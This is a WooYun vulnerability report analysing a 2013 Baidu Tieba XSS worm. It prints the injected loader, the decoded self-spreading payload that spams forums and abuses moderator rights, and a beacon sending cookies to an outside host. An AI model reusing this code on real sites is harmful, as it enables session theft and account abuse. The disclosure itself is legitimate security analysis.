
漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025777

漏洞标题:百度贴吧6月12日XSS漏洞,恶意代码细节分析

相关厂商:百度

漏洞作者: Christohper Meng

提交时间:2013-06-12 20:59

修复时间:2013-07-27 20:59

公开时间:2013-07-27 20:59

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:



漏洞详情

披露状态:

2013-06-12: 细节已通知厂商并且等待厂商处理中
2013-06-15: 厂商已经确认,细节仅向厂商公开
2013-06-25: 细节向核心白帽子及相关领域专家公开
2013-07-05: 细节向普通白帽子公开
2013-07-15: 细节向实习白帽子公开
2013-07-27: 细节向公众公开

简要描述:

标签过滤不严

详细说明:

帖子里插入
<!-- Injected 1x1 "smiley" image: the onload handler creates a <script> element pointing at a remote
     host and appends it to the body. The non-standard `text` attribute on both the image and the
     injected script is a marker; the loaded code later selects on it to remove the elements (self-cleanup).
     The closing `"">` looks like a doubled quote from how the payload was captured. -->
<img class="BDE_Smiley" width="1" height="1" src="" text="nie85bgisn4i82y" onload="var script = document.createElement('script');
script.type = 'text/javascript';script.charset = 'utf-8';
script.setAttribute('text','xsspayloadtoken');
script.src = 'http://jsfile.duapp.com/timer.js';
document.body.appendChild(script)"">aaa
百度又疏忽不解释
载入 http://jsfile.duapp.com/timer.js 后,将 eval 替换为 prompt 解密,得到如下代码:
// Decoded first-stage loader (timer.js). `_$` is the string table the obfuscator hoisted out of the code.
// NOTE(review): the selectors at _$[2] and _$[3] contain unescaped inner double quotes as printed here;
// this is most likely an artifact of how the listing was captured rather than the original quoting.
var _$=["http://jsfile.duapp.com/payload.js", "祝各位吧友端午节快乐,玩的开心", "img[text="nie85bgisn4i82y"]", "script[text="xsspayloadtoken"]", "script", "text/javascript", "utf-8", "text", "xsspayloadtoken"]
// Activation window, hex-encoded: 2013-06-12 17:40 to 21:30 local time (Date months are 0-indexed).
var a=[new Date(0x7dd,0x5,0xc,0x11,0x28,0x0),new Date(0x7dd,0x5,0xc,0x15,0x1e,0x0)];
// The declaration above appears twice in the listing; the second copy is redundant.
var a=[new Date(0x7dd,0x5,0xc,0x11,0x28,0x0),new Date(0x7dd,0x5,0xc,0x15,0x1e,0x0)];
// Time-gated second stage: inside the window the remote payload.js is injected, outside it the victim only
// sees a festive alert (a decoy). `c` (the user's profile URL) is read but never used in this stage.
var b=new Date();var c=PageData.user_name_url;if(b>a[0x0]&&b<a[0x1]){d(_$[0])}else{alert(_$[1])};
// Self-cleanup: remove the injected <img> and <script> by their marker attribute so the DOM shows no trace.
$(_$[2]).remove();
// d(e): inject a <script src=e>, tagged with the same marker attribute so it can be removed the same way.
$(_$[3]).remove();function d(e){var f=document.createElement(_$[4]);f.type=_$[5];f.charset=_$[6];f.src=e;f.setAttribute(_$[7],_$[8]);
document.body.appendChild(f)}
载入的payload.js如下:
// Creates a new thread in the forum identified by id `a` and name `b`, reusing the shared top-level
// request body `c` (built further down from rich_postor._getData()) — so every call posts the same
// title/content. Invoked via setTimeout(string) below; the calls are staggered rather than parallel.
function makeit(a, b) {
c.fid = a,
c.kw = b,
$.post("http://tieba.baidu.com/f/commit/thread/add", c)
};
// Propagation routine. `a` is the marker attribute value that identifies an already-infected thread,
// `b` is the reply text to post. Locals: c = reply body, d = GET-as-document helper, e = forum scan,
// f = per-thread handler, g = reply poster. Note `c` here shadows the top-level `c` used by makeit.
function scan(a, b) {
var c,
d,
e,
f,
g;
// Reply body for the current forum; `tbs` is the page's anti-CSRF token, read straight from PageData.
c = {
kw : PageData.forum.name,
ie : "utf-8",
fid : PageData.forum.id,
content : b,
tbs : PageData.tbs
},
// d(url, cb): fetch `url` as a parsed document and hand responseXML to `cb`. No error handler is set,
// so a failed request silently does nothing.
d = function (a, b) {
var c = new XMLHttpRequest;
c.open("GET", a, !0),
c.responseType = "document",
c.onload = function () {
b(c.responseXML)
},
c.send()
},
// e(): load page 1 of the current forum (cache-busted with a timestamp) and, for every pinned thread
// ("is_top":1 in data-field) with fewer than 50 replies, hand it to f with a has-replies flag.
e = function () {
d("/f?apage=1&kw=" + PageData.forum.name_url + "&t=" + (new Date).getTime(), function (a) {
$(a).find("li[data-field*='\"is_top\":1']").each(function () {
var a = JSON.parse(this.getAttribute("data-field"));
50 > a.reply_num && f(a.id, a.reply_num > 0)
})
})
},
// f(tid, hasReplies): fetch the thread page; skip it if an <img> carrying the marker is already present
// (infection check). Otherwise, when there are replies, walk the floor-reply containers (except floor 1):
// containers with fewer than 5 children get a quoted reply via g(tid, pid); the first container with 5 or
// more stops the walk and triggers a plain g(tid). With no replies, post a plain g(tid).
f = function (b, c) {
d("http://tieba.baidu.com/p/" + b, function (d) {
0 === $(d).find('img[text="' + a + '"]').length && (c ? [].some.call($(d).find('.j_lzl_container:not([data-field$=""floor_num":"1"}"]) > div > .j_lzl_m_w'), function (a) {
return a.childElementCount >= 5 ? !0 : (g(b, JSON.parse(a.parentElement.parentElement.getAttribute("data-field")).pid), void 0)
}) && g(b) : g(b))
})
},
// g(tid, quoteId?): post the reply body to thread `tid`, optionally quoting a post. `Object(c)` returns `c`
// itself rather than a copy, so `tid`/`quote_id` written here persist on the shared body between calls.
g = function (a, b) {
var d = Object(c);
d.tid = a,
b && (d.quote_id = b),
$.post("/f/commit/post/add", d)
},
e()
};
// Second-stage body (payload.js), executed in the victim's session. Every request below rides on the
// victim's cookies and the page-supplied anti-CSRF token (PageData.tbs), which is why the XSS alone suffices.
// Step 1: post a fixed floor-1 reply to the thread currently open. The mouse_pwd* fields are anti-bot
// values captured once and replayed as constants (timestamps from 2013-06-11).
var f = {
kw : PageData.forum.name,
ie : "utf-8",
rich_text : "1",
floor_num : "1",
fid : PageData.forum.id,
tid : PageData.thread.id,
content : "\u697c\u4e3b\u7684\u5e16\u5b50\u8d5e\u4e00\u4e2a\uff01\uff01",
tbs : PageData.tbs,
mouse_pwd : "102,99,101,121,100,101,100,103,92,100,121,101,121,100,121,101,121,100,121,101,92,108,101,100,101,92,100,97,97,101,121,108,101,101,13709731144851",
mouse_pwd_t : "1370973114485",
mouse_pwd_isclick : "1",
lp_type : "0",
lp_sub_type : "0",
anonymous : "0",
tag : "11",
new_vcode : "1"
};
$.post("http://tieba.baidu.com/f/commit/post/add", f);
// Step 2: seed the shared thread-creation body `c` (used by makeit) from the page's own post composer,
// so it already carries whatever hidden fields the legitimate form would send.
var c = rich_postor._getData();
c.prefix = "";
// Random thread content (10 candidates) and title (5 candidates) so the spam is not uniform.
var content = ["\u8fd9\u4e2a\u95ee\u9898\uff0c\u6211\u4eec\u8981\u542c\u542c2\u697c\u7684\u610f\u89c1", "2\u697c\u662f\u6211\u7239\u7239", "\u6211\u662f\u672c\u5427\u7b2c\u4e00\u79d2\u6c89\u5e1d", "\u4e00\u697c\u9632\u541e", "\u5927\u5bb6\u665a\u5b89", "\u6211\u4ece1\u6570\u523020\uff0c\u6ca1\u4eba\u6253\u65ad\u6211\u5c31\u7761\u89c9", "\u597d\u7d2f\uff0c\u611f\u89c9\u4e0d\u4f1a\u518d\u7231\u4e86", "\u4e48\u4e48\u54d2", "\u98de\u8757\u829c\u6e56", "\u4e00\u697c\u5582\u718a"];
content = content[Math.floor(10 * Math.random())];
var title = ["\u4e00\u5bf9\u4e00\u8f7b\u677e\u52fe\u642d\u59b9\u5b50\u795e\u5668", "\u6211\u7231\u4e0a\u6211\u7537\u670b\u53cb\uff0c\u4ed6\u53c8\u4e0d\u7231\u6211\u4e86", "\u795d\u5927\u5bb6\u7aef\u5348\u8282\u5feb\u4e50", "\u795d\u5927\u5bb6\u7cbd\u5b50\u8282\u5feb\u4e50", "\u5427\u53cb\u4eec\u8282\u65e5\u5feb\u4e50\uff01"];
title = title[Math.floor(5 * Math.random())];
// Step 3: from the victim's followed-forum list, collect every forum where their level is above 4 and
// whose id is in neither `whitelist` nor `officialForum` (forum ids compared with loose == against
// string literals). The loop header also declares the three `blacklist` forums targeted unconditionally.
for (var blacklist = ["73787", "59099", "1206079"], blacklistkw = ["\u9b54\u517d\u4e16\u754c", "\u674e\u6bc5", "\u5b59\u7acb\u519b"], whitelist = ["635137", "1074587", "2262468", "2520908", "9046"], officialForum = ["153669", "1065858", "2917706", "898666", "2504636", "1882284", "813565", "1566944", "2331213", "3170781", "350911", "4536", "86209", "2118405", "1962969", "2177090", "746110", "154474", "3025434", "4035056", "1153798"], forumName = [], forumId = [], lf = PageData.user.user_forum_list.info.length, i = 0, j = 0; lf > i; i++)
PageData.user.user_forum_list.info[i].user_level > 4 && (whitelist.some(function (a) {
return a == PageData.user.user_forum_list.info[i].id
}) || officialForum.some(function (a) {
return a == PageData.user.user_forum_list.info[i].id
}) || (forumName[j] = PageData.user.user_forum_list.info[i].forum_name, forumId[j] = PageData.user.user_forum_list.info[i].id, j++));
// Step 4: a second, narrower time gate (2013-06-12 17:50–18:10) swaps in a fixed title/content; otherwise
// the random picks above are used. Then create one thread in each of the 3 blacklist forums, 3 s apart.
// setTimeout is given a string, i.e. an implicit eval of "makeit('<id>','<name>')".
var targetDate = [new Date(2013, 5, 12, 17, 50, 0), new Date(2013, 5, 12, 18, 10, 0)], presentTime = new Date;
for (presentTime > targetDate[0] && targetDate[1] > presentTime ? (c.title = "\u00b7\u00b7\u00b7\u590d\u4ec7\u4e4b\u9b42 \u94c1\u9a91\u8e0f\u8fc7\u00b7\u00b7\u00b7\u80a5\u9e2d\u964d\u4e34", c.content = '', c.content += "\u795d\u7206\u5427\u5927\u5e1d\u56fd\u5404\u4f4d \u53d7 \uff0c\u7aef\u5348\u8282\u5feb\u4e50,\u5475\u5475") : (c.content = '', c.content += content, c.title = title), i = 0; 3 > i; i++)
setTimeout("makeit('" + blacklist[i] + "','" + blacklistkw[i] + "')", 3e3 * i);
// Step 5: one hard-coded thread to forum id 1206079 (same replayed mouse_pwd technique as above), then a
// thread in every forum collected in step 3, 2 s apart.
var slj = {
kw : "\u5b59\u7acb\u519b",
ie : "utf-8",
rich_text : "1",
floor_num : "0",
fid : "1206079",
tid : "0",
mouse_pwd : "36,34,32,58,35,36,35,46,31,39,58,38,58,39,58,38,58,39,58,38,58,39,58,38,58,39,58,38,31,36,35,47,33,37,36,31,39,34,34,38,58,47,38,38,13709733326221",
mouse_pwd_t : "1370973332622",
mouse_pwd_isclick : "1",
title : "\u8fd9\u5427\u91cc\u5c31\u4e00\u7fa4sb\u5475\u5475",
content : '\u65e5\u6f2b\u6bd4\u56fd\u6f2b\u597d\u4e86\u4e0d\u77e5\u9053\u591a\u5c11\u500d',
anonymous : "0",
tbs : PageData.tbs,
tag : "11",
new_vcode : "1"
};
for ($.post("http://tieba.baidu.com/f/commit/thread/add", slj), i = 0; forumName.length > i; i++)
setTimeout("makeit('" + forumId[i] + "','" + forumName[i] + "')", 2e3 * i);
// Step 6 (privilege abuse): if the victim is a forum manager, mark the current thread as "good"
// and keep re-posting that request every 1.2 s for as long as the page stays open (setInterval with a
// string, again an implicit eval).
if (PageData.power.user_roles.is_forum_manager) {
var d = {
ie : "utf-8",
tbs : PageData.tbs,
kw : PageData.forum.name,
fid : PageData.forum.id,
tid : PageData.thread.id,
cid : "0"
};
$.post("http://tieba.baidu.com/f/commit/thread/good/add", d),
setInterval("$.post('http://tieba.baidu.com/f/commit/thread/good/add',d);", 1200)
};
// Step 7 (privilege abuse): if the victim is a bawu or manager, issue a 1-day ban against
// PageData.user_name — i.e. the victim's own account — then read the thread starter's data-field from
// the first post and hide that author. Both rely solely on the victim's moderator rights.
if (PageData.power.user_roles.is_forum_bawu || PageData.power.user_roles.is_forum_manager) {
var ee = {
ban_days : "1",
cm : "filter_forum_user",
fid : PageData.forum.id,
ie : "utf-8",
tbs : PageData.tbs,
user_name : PageData.user_name
};
$.post("http://tieba.baidu.com/bawu/cm", ee);
var LZ = JSON.parse(document.getElementsByClassName("l_post noborder")[0].getAttribute("data-field")),
ef = {
type : "1",
hide_un : LZ.author.name,
ie : "utf-8"
};
$.post("http://tieba.baidu.com/tphide/add", ef)
};
// Step 8: start the worm's spreading pass — marker token first, reply text second (see scan above).
scan("nie85bgisn4i82y", '\u524d\u6392\u6324\u6324');
此外还有一个 gc.js,内容如下:
// gc.js: session-theft beacon. Builds an image URL to a third-party host carrying the page URL, the
// top-frame URL, the full document.cookie, the opener's URL and the logged-in username, and fires it by
// assigning Image.src (no CORS needed). Each value is wrapped in try/catch so a cross-origin access
// error (e.g. top.location from a frame) degrades to '' instead of aborting the beacon.
// Outbound requests to this host are the clearest network indicator of this payload.
(function() {
(new Image()).src = 'http://xsserme.sinaapp.com/index.php?do=api&id=105eXB&location=' + escape((function() {
try {
return document.location.href
} catch (e) {
return ''
}
})()) + '&toplocation=' + escape((function() {
try {
return top.location.href
} catch (e) {
return ''
}
})()) + '&cookie=' + escape((function() {
try {
return document.cookie
} catch (e) {
return ''
}
})()) + '&opener=' + escape((function() {
try {
return (window.opener && window.opener.location.href) ? window.opener.location.href : ''
} catch (e) {
return ''
}
})()) + '&username=' + escape((function() {
try {
return PageData.user_name
} catch (e) {
return ''
}
})());
})();
// Second beacon ("keepsession"): the condition `'1' == 1` is always true, so this always runs and sends
// the location and cookies once more. `keep` is assigned without a declaration (implicit global).
if ('1' == 1) {
keep = new Image();
keep.src = 'http://xsserme.sinaapp.com/index.php?do=keepsession&id=105eXB&url=' + escape(document.location) + '&cookie=' + escape(document.cookie)
};
over

漏洞证明:

修复方案:

版权声明:转载请注明来源 Christohper Meng@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2013-06-15 23:04

厂商回复:

感谢反馈,已从其他渠道知晓并处理,谢谢

最新状态:

暂无